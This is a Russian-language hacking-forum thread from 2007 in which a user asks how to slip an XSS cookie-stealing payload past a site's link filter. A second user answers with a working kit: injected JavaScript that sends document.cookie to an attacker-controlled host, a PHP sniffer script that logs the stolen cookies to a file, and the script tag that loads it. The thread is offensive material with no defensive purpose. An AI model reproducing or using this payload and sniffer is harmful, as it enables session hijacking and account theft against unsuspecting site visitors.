HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Как обойти фильтр при вводе ссылки???
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как обойти фильтр при вводе ссылки???
  #1  
Старый 10.01.2007, 14:18
DesignerMix
Познающий
Регистрация: 10.01.2007
Сообщений: 35
С нами: 10175402

Репутация: 34
Question Как обойти фильтр при вводе ссылки???
Значица есть сайт на котором имеется XSS - дыра, но вот в чём загвоздка. Когда я вставляю код на алерт то окошко вылетает, но как только хочу внести данные о тех кто зайдёт на страничку в лог вот таким образом #<script>location.href="http://ccl.whiteacid.org/log.php?182292"+document.cookie</script># предварительно всё зашифровав фильтр меняет этот код так, чтобы по ссылке автоматически не переходилось #<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>#. Как с этим быть?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 10.01.2007, 18:15
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию
Создаем файл cookie.js и пишем в нем:

location.href='http://твой_сайт_с_php/sniffer.php' + document.cookie;

Создаем файл sniffer.php
Код:
<?php
$cookie = $_SERVER['QUERY_STRING'];
if($cookie)
{
$fp = fopen("cookies.txt", "a+");
fwrite($fp, "Original: ".$cookie."rn"."UrlDecoded: ".urldecode($cookie)."rnrn");
fclose($fp);
header("Location: fbi.gov");
}
?>
Это код простейшего сниффера. Их полно в сети.

Создаем файл cookies.txt и ставим права на запись.
(В доведенный до ума снифер обычно включают различные проверки и нет необходимости создавать другие файлы)

В итоге получаем строчку:
Код:
<script src=http://твой_сайт_с_php/cookie.js></script>
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как меня развели но при етом я поемел бобла All-Mal Болталка 7 28.11.2006 22:59
Плакаль!!!! Бродил вчера по врачебным форумам, искал инфу про лопнувшие в глазах .... $G@mer Болталка 6 12.10.2006 17:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.